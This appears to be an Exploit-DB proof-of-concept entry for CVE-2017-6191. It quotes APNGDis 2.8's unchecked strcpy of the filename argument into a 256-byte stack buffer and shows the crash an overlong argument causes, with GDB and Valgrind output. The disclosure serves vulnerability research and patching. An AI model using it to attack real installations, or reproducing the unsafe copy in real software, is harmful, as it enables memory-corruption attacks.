APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)

EDB-ID:

41670




Platform:

Multiple

Date:

2017-03-14


# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191

Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow

Textbook buffer overflow; a fixed size buffer gets allocated with
szPath[256], and the first command line argument is stored without
validation.


int main(int argc, char** argv)
{
	unsigned int i, j;
	char * szInput;
	char * szOutPrefix;
	char szPath[256];
	char szOut[256];
	std::vector frames;
	printf("\nAPNG Disassembler 2.8\n\n");

	if (argc > 1)
		szInput = argv[1];
	else
	{
		printf("Usage: apngdis anim.png [name]\n");
		return 1;
	}
	strcpy(szPath, szInput);
}




With 'A' * 1000 as argv[1] :


GDB:

Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106     ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) i r
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff70ea600   140737338320384
rcx            0x141    321
rdx            0x0      0
rsi            0x7fffffffca40   140737488341568
rdi            0x4141414141414141       4702111234474983745
rbp            0x7fffffffceb0   0x7fffffffceb0
rsp            0x7fffffffc948   0x7fffffffc948
r8             0x4141414141414141       4702111234474983745
r9             0x9      9
r10            0x73     115
r11            0x7fffffffce78   140737488342648
r12            0x555555558c9f   93824992251039
r13            0x7fffffffcec8   140737488342728
r14            0x0      0
r15            0xffffffffffffffff       -1
rip            0x7ffff6dd1486   0x7ffff6dd1486 <strlen+38>
eflags         0x10297  [ CF PF AF SF IF RF ]


Valgrind:

==10685== Invalid read of size 1
==10685==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685==    by 0x5B711F8: printf (printf.c:33)
==10685==    by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685==    by 0x10B24E: main (apngdis.cpp:498)
==10685==  Address 0x4141414141414141 is not stack'd, malloc'd or
(recently) free'd
==10685==
==10685==
==10685== Process terminating with default action of signal 11 (SIGSEGV)
==10685==  General Protection Fault
==10685==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685==    by 0x5B711F8: printf (printf.c:33)
==10685==    by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685==    by 0x10B24E: main (apngdis.cpp:498)
Reading '==10685==
==10685== HEAP SUMMARY:
==10685==     in use at exit: 0 bytes in 0 blocks
==10685==   total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
==10685==
==10685== All heap blocks were freed -- no leaks are possible